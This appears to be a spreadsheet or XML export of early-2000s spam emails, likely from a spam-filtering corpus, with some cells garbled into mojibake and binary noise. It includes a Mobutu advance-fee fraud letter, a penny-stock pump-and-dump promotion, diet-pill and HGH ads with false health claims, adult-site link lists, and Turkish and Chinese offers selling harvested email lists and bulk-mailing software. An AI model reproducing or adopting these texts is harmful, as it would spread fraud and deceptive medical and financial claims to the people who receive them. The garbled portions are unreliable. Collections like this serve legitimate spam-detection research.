Bu sistemle artï¿½k ï¿½stediï¿½iniz MP3 leri ister tek tek isterseniz albï¿½mler halinde ve birkaï¿½ dakika iï¿½inde sanki disketten bilgisayarï¿½nï¿½za yï¿½kler gibi sï¿½ratle indirebilirsiniz. Turk ve Yabancï¿½ albï¿½mler, klipler ve daha fazlasï¿½...
11gb lik arï¿½ivimize gï¿½z atmak iï¿½in tï¿½klayï¿½n: http://www.jetmp3.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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HELLO,I AM A CITIZEN OF ZAIRE, SON OF THE LATE FORMER
PRESIDENT OF ZAIRE (PRESIDENT MOBUTU SESE SEKO)
SINCE THE DEATH OF MY LATE FATHER SOME YEARS AGO I HAVE
BEEN RESIDING IN SOUTH AFRICA ON TEMPORARY POLITICAL ASYLUM. ON MY ARRIVALIN SOUTH AFRICA AFTER MY LATE FATHER'S BURIAL, I CAME IN WITH A DIPLOMATIC
PACKAGED CONSIGNMENT CONTAINING THE SUM OF $8,000,000.00 (EIGHT MILLION UNITED STATES DOLLARS) WHICH I GOT FROM PART OF THE MONEY MY LATE FATHER MADE THROUGH DIAMONDS SALES WHEN HE WAS THE PRESIDENT OF ZAIRE FOR ABOUT 32 YEARS.PRECISELY, SINCE MY ARRIVAL WITH THE DIPLOMATIC PACKAGED CONSIGNMENT IT HAS BEEN SAFELY KEPT WITH A SECURITY COMPANY HERE IN SOUTH AFRICA.
I DO NOT WANT TO INVEST THIS MONEY IN ANY PART OF
AFRICA DUE TO THE CONSTANT POLITICAL INSTABILITY IN
AFRICA.MY PLAN IS TO USE THIS MONEY TO INVEST IN A
PROFITABLE BUSINESS IN ANY PART OF THE WORLD APART
FROM AFRICA, ALSO TO PURCHASE A RESIDENTIAL
ACCOMMODATION. I WILL COME OVER AND SETTLE THERE
WITH MY FAMILY. HENCE,I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(i.e. AS THE BENEFICIARY) FOR ONWARD
MOVEMENT TO WHERE YOU CAN RECEIVE THE CONSIGNMENT.
PLEASE IF YOU ARE WILLING TO ASSIST ME, DO SEND IN
YOUR REPLY IMMEDIATELY BASED ON THE FOLLOWING: -1) THE PERCENTAGE OF THIS AMOUNT WHICH YOU INTEND
TO CHARGE FOR YOUR ASSISTANCE, PLEASE FEEL FREE TO
EXPRESS YOUR MIND,
(2) INCLUDE YOUR PRIVATE TELEPHONE AND FAX NUMBERS
TO ENHANCE THE CONFIDENTIALITY,WHICH THIS BUSINESS
DEMANDS.
I SHALL INFORM YOU ON THE NEXT LINE OF ACTION AS
SOON AS I RECEIVE YOUR POSITIVE RESPONSE. 10% OF THE TOTAL MONEY WILL BE SET ASIDE FOR ANY EXTRA EXPENDITURE. I ASSURE YOU THAT THIS DEAL IS 100% RISK
FREE AS LONG AS WE KEEP IT TO OURSELVES.
YOUR URGENT RESPONSE THROUGH MY E-MAIL SHALL BE
HIGHLY APPRECIATED.BEST REGARDS,TAMKO MOBUTU.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Below is the result of your feedback form.  It was submitted by
 (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 01:23:03
---------------------------------------------------------------------------: 
Hey wassup my names mandy, I got this new webpage, Im trying to see if things look alright before i publish it. Can you come and check it out for me!
Check it out!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</si>
  <si>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A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
                                 For 
                                       Immediate ReleaseCal-Bay (Stock Symbol:Â CBYI) 
      Watch for analyst "Strong Buy Recommendations" and several advisory newsletters 
      picking CBYI.Â Â  CBYI has filed to be traded on theÂ OTCBB, 
      share prices historically INCREASE when companies get listed 
      on this larger tradingÂ exhange. CBYI is trading around 25 cents 
      and should skyrocket to $2.66 - $3.25 a share in the near future. Â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contracts.Â  IMPRESSIVE client list including theÂ U.S. Air Force, 
      Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries, 
      GE-Energy &amp; Environmental Research.RAPIDLY GROWING INDUSTRYÂ Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.!!!!! CONGRATULATIONS 
      !!!!!Our last recommendation to buyÂ ORBT at 
      $1.29Â ralliedÂ and is holding steady atÂ $4.51!Â  
      Congratulations to all our subscribers that took advantage of this 
      recommendation.
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to:
NoMore@btamail.net.cnÂ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published.Â  Factual statements 
are made as of the date stated and are subject to change without notice.Â  
Not intended for recipients or residents of CA,CO,CT,DE,ID,      
      IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
prohibited.Â 
Copyright c 2001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</si>
  <si>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.ukqdrblkougooeoffnxsmbowei
</t>
  </si>
  <si>
    <t xml:space="preserve">TR Rehber 6 REKLAMLARINIZA SERVET Ã–DEMEYiN!!! UCUZ, KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ...
    Bu ileti size islerinizi kolaylastirmak, satislarinizi arttirmak, kisacasi 
  milyonlara sesinizi duyurmak icin gÃ¶nderilmistir. Bu tÃ¼rden tanitimlarla 
  ilgilenmiyorsaniz bu iletiyi, "ilgilenecegini dÃ¼sÃ¼ndÃ¼gÃ¼nÃ¼z" tanidiklariniza 
  gÃ¶nderiniz. Bu iletinin size ve tanidiklariniza kazandiracaklarina 
  inanamayacaksiniz!.Herseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuzÂ listelerden cikmak istiyorsaniz 
  bu iletiyi bos olarak cevaplamaniz yeterli olacaktir.
  TÃ¼m Ã¶nerilerinizi dikkate alip degerlendiriyoruz.. LÃ¼tfen olumlu olumsuz 
  elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz..
Â 
TR Rehber 8.0 GÃ¼ncellenme Tarihi 10 Temmuz 2002'dir.. TR Rehber ve World Rehberi aldiginizda bir sonraki gÃ¼ncellemedeÂ  herhangi bir Ã¼cret Ã¶demeyeceksiniz.. Daha Ã¶nceden alis-veris de bulundugumuz mÃ¼sterilerimize %50 indirim imkani sunuyoruz..      Â 
.::Rehberlerimizin Ortak 
      Ã–zellikleri::.            Detayli kategorili ; daha fazla bilgi iÃ§in web sayfamÄ±zi ziyaret 
            ediniz..            ilave programlar ; mailling iÃ§in min. dÃ¼zeyde programlar..            Kullanimi kolaylaÅŸtÄ±rÄ±cÄ± tÃ¼rkÃ§e dÃ¶kÃ¼man ve video formatÄ±nda 
            aÃ§Ä±klamalar..Sanayi Rehberi 
Hediyeli..800.000 
Arama Motoruna  Ã¼cretsiz kayÄ±t 
  imkanÄ±..** SINIRSIZ telefon, e-mail ve icq ile 
            destek garantisi..TR Rehber 8.5400.000.000 TL.6.000.000 TÃ¼rk e-mail adresi..TR Rehber 7.0350.000.000 TL.4.000.000 TÃ¼rk e-mail adresi..TR Rehber Ã–zel
250.000.000 TL.2.000.000 Firma bazlÄ± e-mail adresi..World Rehber 2.5350.000.000 TL.            150.000.000 yabanci e-mail adresi..ICQ Rehber Ã–zel150.000.000 TL.2.500.000 TÃ¼rk ICQ kullanÄ±cÄ±si..Sanayi Rehberi50.000.000 TL.TÃ¼rkiye deki tÃ¼m firmalar..Â * TR ve WORLD Rehber birlikte 
            aldiginizda Hotmail Kullanici listesini 
HEDiYE ediyoruz..* Eski mÃ¼sterilerimize %50 indirimimiz 
            devam etmektedir..* Not: Fiyatlara KDV ve Kargo Ã¼creti 
            dahil edilmemiÅŸtir..
Â 
TR 8.0 ve World Rehber birlikte sadece 750.000.000 TL.Yerine 
      600.000.000 TL.
Â  GÃ¼ncelleme islemlerinde 
      ki indirim oranÄ±mÄ±z %50'dir. 
Â 
      800.000 Arama motoruna kayit islemi 30.000.000TL + KDV 
Â TÃ¼m 
      versiyonlarimizda gÃ¶nderim islemi icin gerekli ve en kullanisli programlar 
      bulunmaktadir. Bu programlarin video 
      formatinda aciklamalari da CD'ler icerisinde bulunmaktadir...
Â Bu programlar sizin 
      iletilerinizi kolay bir sekilde gÃ¶ndermenizi saglarken, iletilerinizi 
      alan kisilerin kullandigi serverlarin da yorulmamasini(karsi tarafta problem 
      yaratilmamasini) saglayacaktir...
Â 
Bu programlar ISP yada hosting firmanizin 
      SMTP serverini kullanmaniza gerek kalmadan direkt gÃ¶nderim yapabilmenizi 
      saglayacaktir. isterseniz bir checkbox'i isaretliyerek kullanmak 
      istediginiz SMTP server ileÂ  fault-tolerance yaparak gÃ¶nderdiginiz 
      iletilerin %100 yerine ulasmasini saglayabilirsiniz...
Â 
SMTP server kullanmadan gÃ¶nderdiginiz 
      mesajlar bilinenin aksine daha basarili gÃ¶nderim yapacakdir. CÃ¼nkÃ¼ 
      mesajlarin yerine ulasip ulasmadigini gÃ¶rÃ¼p mÃ¼dahele yapmak sizin elinizde 
      olacaktir...
Â 
Ayrica bu programlar HTML formatinda 
      mesaj gÃ¶nderimini de desteklemektedir. Bu destek sayesinde renkli, resimli 
      daha gÃ¶rsel ve dikkat cekici iletiler gÃ¶nderebilirsiniz...
Â CD icerisindeki bÃ¼yÃ¼k e-mail 
      listelerini kolayca dÃ¼zenleyebileceginiz, istenmeyen e-mail adreslerini 
      otomatik olarak silebileceginiz ve her tÃ¼rlÃ¼ kategoriye ayirabileceginiz 
      programlar da Ã¼cretsiz olarak verilmektedir...
Â TR rehber ve World 
      Rehberi birlikte aldiginizda, bir sonraki gÃ¼ncel versiyonlari adresinize 
      Ã¼cretsiz gÃ¶nderiyoruz... Bunun icin lÃ¼tfen gÃ¼ncelleme maili aldiginizda 
      bize geri dÃ¶nÃ¼nÃ¼z..
.:: 
  HEDEF KiTLE TESPiDi ::.Hedef kitlenize ulasmanizi saÄŸlayaciÄŸimiz bu 
    Ã¶zel yÃ¶ntem hakkinda mutlaka bilgi isteyiniz...:: TARGET MAILLING ::.
iletisim Bilgileri : ( Pazar haric hergÃ¼n 09:00 ile 19:30 arasi)GSM:+ 90 535 482.97.19Â  GÃ¶khan 
      ATASOYTAKLiTLERiMiZDEN SAKININ, GARANTiSi OLMAYAN Ã¼RÃ¼NLER, HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR.. Â GÃ¼nÃ¼mÃ¼z 
  TÃ¼rkiye'sinde internet 
  araciligiyla yapilan reklamlar hizla artmaktadir. TÃ¼rkiye'de ve dÃ¼nyada bircok 
  firma bu yÃ¶ntemlerle kendini tanitmaktadir.Bu artisin icinde sizin de yeralmaniz 
  kacinilmaz bir gercek olacaktir.
Herseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz
      Â listelerden cikmak istiyorsaniz 
uyeiptal@gmx.netÂ 
      adresine boÅŸ bir mail gÃ¶ndermeniz yeterli olacakdÄ±r.-------------------------------------------------------
This sf.net email is sponsored by: Jabber - The world's fastest growing 
real-time communications platform! Don't just IM. Build it in! 
http://www.jabber.com/osdn/xim
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Learn from the BEST...for FREE! Learn to locate the markets that will make you money. 
You'll learn how to find and track both stocks and 
commodities with our FREE software. There's more... We'll also give you 90 days' worth of FREE expert 
training in the use of our software. Once you're comfortable, your first five trades are 
also free - NO FEES! We have the system that has 
returned profits, and you can have your own personal
consultant - FREE customer service for a full 90 days 
to help you learn how to work from home with our free 
software. Simply click below for more details and to request 
your free software: http://www.page4life.org/users/invest20/invest/trade.html
To be removed from any future mailings, please visit
this page:http://www.page4life.org/users/invest20/invest/cleanlist.html7593AVEx4-349vjkA2882cneQ0-78l27
</t>
  </si>
  <si>
    <t xml:space="preserve">Computer Privacy Help elizabeth0318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</si>
  <si>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As seen on NBC, CBS, CNN, and Oprah!
Would you like to lose weight while you
      sleep?
      No dieting!
      No hunger pains!
      No Cravings!
      No strenuous exercise!
      Change your life forever!
      100% GUARANTEED!
www.Quality-HGH.com* Body Fat Loss            82% improvement.
      * Wrinkle Reduction     61% improvement.
      * Energy Level              84% improvement.
      * Muscle Strength         88% improvement.
      * Sexual Potency         75% improvement.
      * Emotional Stability      67% improvement.
      * Memory                      62% improvement.
www.Quality-HGH.com
Â 
Â 
Â 
Â 
HOW TO UNSUBSCRIBE:Â 
You received this e-mail because you are registered at one of our Web sites, or on one of our partners' sites.
 If you do not want to receive partner e-mail offers, or any email marketing from us please
 click here.lindacucme@att.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you dream of working for yourself? From the
luxury of your own home?THEN STOP DAYDREAMING AND DO SOMETHING ABOUT IT!
IT WONT HAPPEN JUST SITTING THERE!FREE INFO! FREE INFO! FREE INFO!
No obligation whatsoever.http://www.lotsonet.com/opportunityWe are a fortune 500 company and we want motivated
individuals who are willing to work from home.  This
is not a get rich quick scheme, you will have to work,
but you can do it from the comfort of your own home,
and make much more than you can working for someone
else.FREE INFO! FREE INFO! FREE INFO!
No obligation whatsoever.
http://www.lotsonet.com/opportunity
To be removed from this list go to:http://www.lotsonet.com/opportunity/remove.html--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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                                                #
#                 Adult ClubÂ™                    #
#           Offers FREE Membership               #
#                                                #
##################################################15 of the Best Adult Sites on the Internet for FREE!
&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
&gt;&gt;&gt;  Your User Name And Password is.
&gt;&gt;&gt;  User Name: cpunks@minder.net
&gt;&gt;&gt;  Password: d0949w4z---------------------------------------NEWS 07/01/02
With just over 2.2 Million Members that signed up for FREE, Last month there were 429,947 New 
Members. Are you one of them yet???---------------------------------------Our Membership FAQ
Q. Why are you offering free access to 15 adult membership sites for free?
A. I have advertisers that pay me for ad space so you don't have to pay for membership.Q. Is it true my membership is for life?
A. Absolutely you'll never have to pay a cent the advertisers do.Q. Can I give my account to my friends and family? 
A. Yes, as long they are over the age of 18.Q. Do I have to sign up for all 15 membership sites?
A. No just one to get access to all of them. Q. How do I get started? 
A. Click on one of the following links below to become a member.---------------------------------------# 15. &gt; NEW! &gt; Celebs TV 
Click Here &gt; http://157.237.128.20/celebst/?aid=818932
# 14. &gt; NEW! &gt; Naughty Live Cam
Click Here &gt; http://157.237.128.20/cams/?aid=818932# 13. &gt; Adults Farm
Click Here &gt; http://157.237.128.20/farm/?aid=818932
# 12. &gt; Fetish Door
Click Here &gt; http://157.237.128.20/fetish/?aid=818932# 11. &gt; Teen Sex Dolls (Voted Best Adult Site 2001-2002!)
Click Here &gt; http://157.237.128.20/teen/?aid=818932
#10. &gt; Sweet Latinas
Click Here &gt; http://157.237.128.20/latina/?aid=818932# 9. &gt; Fetishes
Click Here &gt; http://157.237.128.20/wicked/?aid=818932
# 8. &gt; Tits Patrol
Click Here &gt; http://157.237.128.20/tits/?aid=818932
# 7. &gt; Pinklicious
Click Here &gt; http://157.237.128.20/pink/?aid=818932
# 6. &gt; Play House Porn
Click Here &gt; http://157.237.128.20/play/?aid=818932
# 5. &gt; Sinful Cherries
Click Here &gt; http://157.237.128.20/sinful/?aid=818932
# 4. &gt; Asian Sex Fantasies
Click Here &gt; http://157.237.128.20/asian/?aid=818932
# 3. &gt; Hot Stripper Sluts
Click Here &gt; http://157.237.128.20/stripper/?aid=818932
# 2. &gt; Lesbian Lace 
Click Here &gt; http://157.237.128.20/lesbian/?aid=818932
# 1. &gt; Gay Porn Club
Click Here &gt; http://157.237.128.20/stripper/?aid=818932
---------------------------------------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 hours for removal.This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection 
Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.tosjkmackiswohspfkxywojjgmlr--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Dear Computer User jlugo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</si>
  <si>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Now!!!If above link doesn't work, Click Here
Â 
5945CoCw8-467cUcN8670ndsz7-l25--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Long time no chat!How have you been? If you've been like me, you've been trying
trying almost EVERYTHING to lose weight.Â  I know how you feel
- the special diets, miracle pills, and fancy exercise 
equipment never helped me lose the pounds I needed to lose
either.Â  It seemed like the harder I worked at it, the less
weight I lost - until I heard about 'Extreme Power Plus'.You're probably thinking to yourself, "Oh geez, not another
miracle diet pill!"Â  Like you, I was skeptical at first, but 
my sister said it helped her lose 23 pounds in just 2 weeks, 
so I told her I'd give it a try.Â  I mean, there was nothing 
to lose except a lot of weight!Â  Let me tell you, it was
the best decision I've ever made.  PERIOD.  Six months later,
as I'm writing this message to you, I've gone from 355 pounds
to 210 pounds, and I haven't changed my exercise routine or diet
at all.Â  Yes, I still eat pizza, and lots of it!I was so happy with the results that I contacted the manufacturer
and received permission to resell it - at a HUGE discount.Â I feel
the need to help other people lose weight like I did, because it
does so much for your self-esteem, not to mention your health.
I am giving you my personal pledge that 'Extreme Power Plus'
absolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!If you are frustrated with trying other products, without having 
any success, and just not getting the results you were promised,
then I recommend the only product that worked for me - 
'EXTREME POWER PLUS'!You're probably asking yourself, "Ok, so how does this stuff
actually work?"Extreme Power Plus contains Lipotropic fat burners and ephedra which 
is scientifically proven to increase metabolism and cause rapid 
weight loss. No "hocus pocus" in these pills - just RESULTS!!! Here is the bottom line ...I can help you lose 10-15 pounds per week naturally, without
exercising and without having to eat rice cakes all day.Â  
Just try it for one month - there's pounds to lose and confidence 
to gain!Â  You will lose weight fast - GUARANTEED.Â  This is my
pledge to you.BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more!Â  To order Extreme Power Plus on our secure server, just click
on this link -&gt; http://www.2002dietspecials.com/To see what some of our customers have said about this product, 
visit http://www.2002dietspecials.com/testimonials.shtmlTo see a list of ingredients and for more information
on test studies and how it will help you lose weight, visit 
http://www.2002dietspecials.com/ingre1.shtml**************************************************************
If you feel that you have received this email in error, please 
send an email to "print2@btamail.net.cn" requesting to be 
removed. Thank you, and we apologize for any inconvenience.
**************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 10:49:57
---------------------------------------------------------------------------: CLICK HERE FOR SOME OF THE BEST AND NASTIEST XXX ON THE NET! YOU DONT EVEN NEED A CREDIT CARD!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</si>
  <si>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When America's top companies compete for your business, you win.http://four87.six86.com/sure_quote/sure_quote.htmTake a moment to let us show you that we are here to save you money and address your concerns
with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's
top companies.-Life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well.http://four87.six86.com/sure_quote/sure_quote.htm"...was able to get 3 great offers in
less than 24 hours." -Jennifer C"Met all my needs... being able to search
for loans in a way that puts me in control." -Robert T."..it was easy, effortless...!"-Susan A. Click here to delete your address from future updates.
http://four87.six86.com/sure_quote/sure_quote/rm/--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Want to watch HARDCORE PORN MOVIES ? Our site is voted the #1 BROADBAND MOVIE SITE ONLINE !Click this link to WATCH OUR STEAMING CHIX IN ACTION :http://www.froggyhost.com/clubs/sexmoviestoday/To unsubscribe from our list enter you email here :
http://www.froggyhost.com/clubs/remove/  [JK9^":}H&amp;*TG0BK5NKIYs5]
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear cypherpunks ,  ã€€
  Â Â Â Â Â Â Â Â Â Â Â Â 7000ä¸‡ï¼ˆç»æ— é‡å¤ï¼‰EMAILåœ°å€æ•°æ®åº“,å¤§ç‰¹ä»·ï¼š150å…ƒ!!!
Â Â Â Â Â Â Â Â Â Â Â Â Â Â  
          ï¼ˆåŒ…æ‹¬ç‰¹å¿«ä¸“é€’è´¹å’Œå…‰ç›˜è´¹ï¼‰Â Â   
æ‚¨æ— é¡»æŠ•å…¥å·¨é¢çš„å¹¿å‘Šè´¹,æ‚¨æ— é¡»æ‹…å¿ƒæ‚¨çš„äº§å“æ²¡äººçŸ¥é“ï¼Œæ‹¥æœ‰äº†7000ä¸‡E-mailåœ°å€,æ‚¨å°±æ‹¥æœ‰äº†7000ä¸‡çš„æ½œåœ¨å®¢æˆ·ç¾¤.æ‚¨å¯å‘å¹¿å¤§çš„å®¢æˆ·å®£ä¼ è‡ªå·±çš„å…¬å¸ï¼Œé”€å”®è‡ªå·±çš„å•†å“,å¯»æ‰¾ä»£ç†å•†ï¼Œå¯»æ±‚å•†ä¸šåˆä½œä¼™ä¼´,è¿…é€Ÿæé«˜ç½‘ç«™çš„çŸ¥ååº¦,è®©æ‚¨çš„å…¬ï¿½=!
 BEï¼Œæ‚¨çš„äº§å“ï¼Œæ‚¨çš„è‰¯å¥½å½¢è±¡åœ¨äº’è”ç½‘ä¸Šå¿«é€Ÿå±•çŽ°ï¼Œè®©æˆåƒä¸Šä¸‡çš„å®¢æˆ·ä¸Žæ‚¨å»ºç«‹åˆä½œå…³ç³»ã€‚
          ã€€
        Â Â  
          æœ¬ç«™ä¸“ä¸šä»Žäº‹å•†ä¸šç”µå­é‚®ä»¶æœåŠ¡ä¸šåŠ¡ï¼Œä¸ºäº†è§£å†³å¤§å®¶æœé›†E-Mailåœ°å€çš„å›°éš¾ï¼ŒçŽ°å°†å…¬å¸E-Mailåœ°å€åº“å…¬å¼€å‡ºå”®ï¼Œå¦å¼€å±•å¹¿å‘Šé‚®ä»¶åˆ›æ„ã€åˆ¶ä½œã€æ‰¹é‡é‚®ä»¶å‘é€ç­‰å¢žå€¼ä¸šåŠ¡ã€‚å¯å…è´¹è¯•ç”¨ï¼Œæ»¡æ„åŽä»˜æ¬¾ï¼Œå¹¶æœ‰å¤šç§åˆä½œæ–¹å¼ä¾›æ‚¨é€‰æ‹©ã€‚
          Â Â Â Â Â  æœ¬ç«™E-Mailåœ°å€åº“å‡ç”±ä¸“ä¸šäººå‘˜æ”¶é›†ã€éªŒè¯ï¼Œå¹¶ä¸æ–­æ›´æ–°ï¼Œä¿è¯ 
          å…¶çœŸå®žæœ‰æ•ˆã€‚
é‚®ä»¶é€®æ•è½¯ä»¶ 
    å”®ä»·ä»…ä¸ºï¼šäººæ°‘å¸98å…ƒã€‚ï¼ˆæ¬¢è¿Žå…è´¹ç´¢å–è¯•ç”¨ç‰ˆæœ¬ï¼‰
Â Â Â Â Â   
    å¯ä»Žç½‘ç«™ï¼Œç½‘é¡µä¸­æ”¶é›†E-mailåœ°å€ï¼Œä¹Ÿå¯ä»¥æ ¹æ®å…³é”®è¯åœ¨å„å¤§æœç´¢å¼•æ“Žä¸­æ”¶é›†ç¬¦åˆè¦æ±‚çš„é‚®ä»¶åœ°å€ï¼Œå¤šçº¿ç¨‹å·¥ä½œã€‚
è½¯ä»¶ä¸‹è½½ï¼šhttp://www.wldbiz.com/soft/EmailScan.zip
ï¼ˆå› ä¸‹è½½çš„äººæ•°è¾ƒå¤šï¼Œè¯·å¤šåˆ·æ–°å‡ æ¬¡ï¼›æˆ–å‘emailå…è´¹ç´¢å–ï¼‰Â Â   
    äº’è”ç½‘çš„å‘å±•ä¸ºæˆ‘ä»¬çš„æ—¥å¸¸å•†åŠ¡æ´»åŠ¨å¸¦æ¥äº†æžå¤§çš„æ–¹ä¾¿ä¸Žæ•ˆç›Šã€‚é€šè¿‡ç½‘ç»œå¯»æ‰¾å®¢æˆ·å·²æ˜¯å•†å®¶è¥é”€æ´»åŠ¨ä¸­å¿…ä¸å¯å°‘çš„çŽ¯èŠ‚ï¼›ä½†ç½‘ç»œæµ©ç€šï¼Œå¯»æ‰¾å®¢æˆ·ä¹Ÿå¦‚å¤§æµ·æžé’ˆã€‚å¦‚ä½•æ‰èƒ½åœ¨å¦‚æ­¤å¹¿é˜”çš„ç©ºé—´é«˜æ•ˆã€å®šå‘åœ°å¯»æ‰¾è‡ªå·±çš„ç›®æ ‡å®¢æˆ·å‘¢ï¼Ÿæœ¬å¥—è½¯ä»¶æ•´åˆäº†å¤§é‡çè´µçš„å›½å†…å¤–å•†è´¸èµ„æºï¼Œå¯ä»¥åŒæ—¶å¯¹æ•°ç™¾å®¶æœç´¢å¼•æ“Žã€å•†è´¸ç½‘ç«™ã€é»„é¡µåŠå·¥å•†åå½•ç­‰æŒ‰æŒ‡å®šå…³é”®å­—è¿›è¡Œå…¬å¸åŠå•†æƒ…æœç´¢ï¼Œç›´ï¿½!
 è¯±ä¸šç¤ï¿½æºå®¢æˆ·çš„EMAILåœ°å€ã€‚æ‹¥æœ‰æœ¬å¥—è½¯ä»¶ï¼Œå°†æ²¡æœ‰æ‰¾ä¸åˆ°çš„å®¢æˆ·ï¼Œæ²¡æœ‰åšä¸æˆçš„ç”Ÿæ„ã€‚è”ç³»æ–¹æ³•
ç”µè¯ï¼š0579-3891520Â  email: 
    qingqing@southwesttravelers.com
é¡ºç¥å•†ç¥ºï¼
å†’æ˜§æ‰“æ‰°ï¼Œæ•¬è¯·è°…è§£ï¼å¦‚æœ‰ä¸ä¾¿ï¼Œä¸‡æœ›æµ·æ¶µï¼å¦‚ä¸æƒ³è®¢é˜…ï¼Œè¯·å‘è‡³ï¼šremove@sina.comæˆ‘ä»¬å³å°†å…¶ä»Žåˆ—è¡¨ä¸­åˆ é™¤ã€‚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</si>
  <si>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JetMp3 Tï¿½rkiye'de ilk kez uygulanan bir sistemi hayata geï¿½irdi.
http://www.jetmp3.com
Bu sistemle artï¿½k ï¿½stediï¿½iniz MP3 leri ister tek tek isterseniz albï¿½mler halinde ve birkaï¿½ dakika iï¿½inde sanki disketten bilgisayarï¿½nï¿½za yï¿½kler gibi sï¿½ratle indirebilirsiniz. Turk ve Yabancï¿½ albï¿½mler, klipler ve daha fazlasï¿½...
11gb lik arï¿½ivimize gï¿½z atmak iï¿½in tï¿½klayï¿½n: http://www.jetmp3.comï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½+,ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½'ï¿½ï¿½ï¿½uï¿½ï¿½%ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½(ï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½-ï¿½ï¿½0ï¿½x+yï¿½ï¿½ï¿½)ï¿½rï¿½ï¿½ï¿½xï¿½jï¿½ï¿½ï¿½ï¿½ejï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½- ï¿½ï¿½ï¿½)]ï¿½ï¿½ï¿½ï¿½_x001B_mï¿½ï¿½ï¿½ï¿½_x000C_ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½)ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½_x001C_ï¿½ï¿½^ï¿½ï¿½Zï¿½Iï¿½ï¿½Xï¿½ï¿½Xï¿½ï¿½(ï¿½zï¿½(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½aï¿½ï¿½lï¿½ï¿½ï¿½ï¿½ï¿½lï¿½ï¿½.ï¿½ï¿½ï¿½ï¿½ï¿½_x001E_ï¿½wï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½bï¿½ï¿½?ï¿½+^ï¿½ï¿½(ï¿½ï¿½ï¿½ï¿½ï¿½d
</t>
  </si>
  <si>
    <t xml:space="preserve">
COPY YOUR DVD MOVIES! 
CLICK HERE FOR
FREE
                SOFTWARE!COPY 
              DVD MOVIES TO CD-R
              RIGHT NOW!NEW!
DVDCopyPlus 4.0
                All the software you need to COPY your own DVD Movies is included 
                in DVDCopyPlus4.0! 
Copy 
                your own DVD Movies using nothing more than our software, a DVD-ROM 
                and your CD-R burner!Backup 
                  your DVD Movie Collection
Playback 
                  on any home DVD player*
No 
                  Expensive DVD Burner Required
Free 
                  Live Tech Support*DVD 
              Player must support VCD/SVCD format. Most DVD players include this 
              feature. 
Â 
Â 
You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit http://opt-out.consumerpackage.net/?e=cdr@lne.com.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</si>
  <si>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sarki
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>RE: CLAIM YOUR FREE STORAGE REEL &amp; SPRAY GUN ($20 Value) WITH FLATHOSE!
&lt;!--
.BODYCOPY {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: normal;
	color: #000000;
}
.BOLD {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bolder;
	color: #000000;
}
.BOLDRed {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-weight: bolder;
	color: #FF0000;
}
--&gt;
Â 
Never be tangled up in yard work again! Break 
          free with the amazing Flat Hose. It is "Firehose Technology" 
          for flat, tangle-free, space-saving storage. This amazing flat coiling 
          garden hose is guaranteed to take the mess out of watering. And it 
          attaches easily to any faucet -- where your old hose used to lay in a 
          muddy pile.Watering your plants or washing the car has never 
            been easier.
